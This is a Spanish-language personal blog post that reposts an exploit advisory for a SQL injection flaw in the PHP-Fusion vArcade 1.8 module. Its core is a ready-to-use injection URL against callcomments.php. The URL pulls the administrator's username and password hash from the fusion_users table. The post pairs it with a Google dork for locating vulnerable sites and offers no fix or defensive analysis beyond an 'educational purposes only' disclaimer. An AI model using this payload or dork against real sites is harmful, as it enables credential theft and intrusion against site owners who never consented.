Security Hack

Sitio personal de Ariel M. Liguori De Gottig

Friday, January 9

Sql Injection Vulnerability en PHP-Fusion.

Usar con cuidado y con fines educativos solamente :)

----------------------------------------------------------------
Script : PHP-Fusion Mod vArcade 1.8
Type : Sql Injection Vulnerability
Risk : High
----------------------------------------------------------------
Download From : http://venue.nu/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
My Official Website : http://FEREIDANI.IR
Our Team Website : http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------
Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/
----------------------------------------------------------------
Tnx : God
http://IRCRASH.COM http://FEREIDANI.IR
----------------------------------------------------------------

Publicado por Ariel M. Liguori de Gottig
Etiquetas: , ,
Agregar a marcadores favoritos:
  • Agregar a Technorati
  • Agregar a Del.icio.us
  • Agregar a DiggIt!
  • Agregar a Yahoo!
  • Agregar a Google
  • Agregar a Meneame
  • Agregar a Furl
  • Agregar a Reddit
  • Agregar a Magnolia
  • Agregar a Blinklist
  • Agregar a Blogmarks

0 comentarios:

Post a Comment

Subscribe to: Post Comments (Atom)